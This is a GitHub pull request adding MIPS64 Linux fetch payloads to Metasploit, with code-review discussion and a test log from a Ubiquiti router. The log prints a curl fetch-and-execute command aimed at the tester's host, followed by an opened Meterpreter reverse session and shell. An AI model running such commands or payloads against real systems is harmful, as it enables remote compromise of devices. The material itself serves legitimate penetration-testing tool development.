Add MIPS64 Linux Fetch Payloads #18044

Merged
merged 3 commits into from Jun 2, 2023

Conversation

zeroSteiner

This adds MIPS64 fetch based payloads to the existing x64 ones we originally added.

I was able to test the cmd/linux/http/mips64/meterpreter_reverse_tcp with a Ubiquiti USG. This is related to #18016 and my comment here.

Testing

  • Use one of the new cmd/linux/http/mips64/* payloads
  • Configure the datastore options and start the handler
  • Generate the payload and run it
  • Get a session

The size requirement is used when the adapted payload is executed from
the command line but that's not the case for the fetch payloads which
execute a command to fetch the payload from a URL. The payload size
doesn't matter because it's included in the executable file hosted at
the URL.
Comment on lines -39 to -44
def compatible?(mod)
if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
return false
end
super
end
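Review bot: dropping the `compatible?` override removes the `CachedSize >= 120_000` guard without putting anything in its place, which is the right call for a fetch adapter: the executed command only carries a short fetch one-liner and a URL, and the payload binary itself is served over HTTP, so the `# echo does not have an unlimited amount of space` concern that motivated the cap no longer applies. Two consequences are worth stating in the commit message for future readers: payloads whose `CachedSize` is `:dynamic` are now accepted by this adapter too, and compatibility is decided solely by `super` (the base adapter's arch/platform filtering).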
zeroSteiner (PR author):

This size restriction was carried over from some of the other adapters. The adapters prior to the fetch payloads executed the payload in the command instead of fetching it from a server. For that reason, the command could grow quite large depending on the payload that was selected. The fetch payloads place the adapted payload into an executable binary and request it from a server, so the executed command does not contain it and thus the size doesn't matter.

@gwillcox-r7 gwillcox-r7 added payload rn-payload-enhancement release notes for enhanced payloads labels May 31, 2023

@smcintyre-r7 smcintyre-r7 left a comment


You need to add the new payloads to the specs.

@smcintyre-r7 smcintyre-r7 added rn-modules release notes for new or majorly enhanced modules and removed rn-payload-enhancement release notes for enhanced payloads labels Jun 1, 2023
@bwatters-r7

msf6 > use payload/cmd/linux/http/mips64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/linux/http/mips64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      KvMWXTbj         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set FETCH_SRVHOST 192.168.1.6
FETCH_SRVHOST => 192.168.1.6
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set verbose true
verbose => true
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler

[*] Command to run on remote host: curl -so /tmp/OAuhefDppmsz http://192.168.1.6:8080/JNadUtp7WutSvvbMBB9kcg; chmod +x /tmp/OAuhefDppmsz; /tmp/OAuhefDppmsz &
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch Handler listening on 192.168.1.6:8080
[*] HTTP server started
[*] Adding resource /JNadUtp7WutSvvbMBB9kcg
[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Client 192.168.1.1 requested /JNadUtp7WutSvvbMBB9kcg
[*] Sending payload to 192.168.1.1 (curl/7.26.0)
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.1:47658) at 2023-06-01 11:30:45 -0500

msf6 payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           : Debian 7.11 (Linux 3.10.20-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : mips64/linux
meterpreter > shell
Process 3213 created.
Channel 1 created.
cat /proc/cpuinfo
system type		: UBNT_E120
machine			: Unknown
processor		: 0
cpu model		: Cavium Octeon+ V0.1
BogoMIPS		: 1000.00
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes, count: 2, address/irw mask: [0x0ffc, 0x0ffb]
isa			: mips1 mips2 mips3 mips4 mips5 mips64r2
ASEs implemented	:
shadow register sets	: 1
kscratch registers	: 0
core			: 0
VCED exceptions		: not available
VCEI exceptions		: not available

processor		: 1
cpu model		: Cavium Octeon+ V0.1
BogoMIPS		: 1000.00
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 64
extra interrupt vector	: yes
hardware watchpoint	: yes, count: 2, address/irw mask: [0x0ffc, 0x0ffb]
isa			: mips1 mips2 mips3 mips4 mips5 mips64r2
ASEs implemented	:
shadow register sets	: 1
kscratch registers	: 0
core			: 1
VCED exceptions		: not available
VCEI exceptions		: not available

exit
meterpreter > 


@smcintyre-r7 smcintyre-r7 left a comment


Specs have been added!

@bwatters-r7 bwatters-r7 merged commit 1e9d286 into rapid7:master Jun 2, 2023
30 checks passed
@bwatters-r7

Release Notes

Add MIPS64 Linux Fetch Payloads
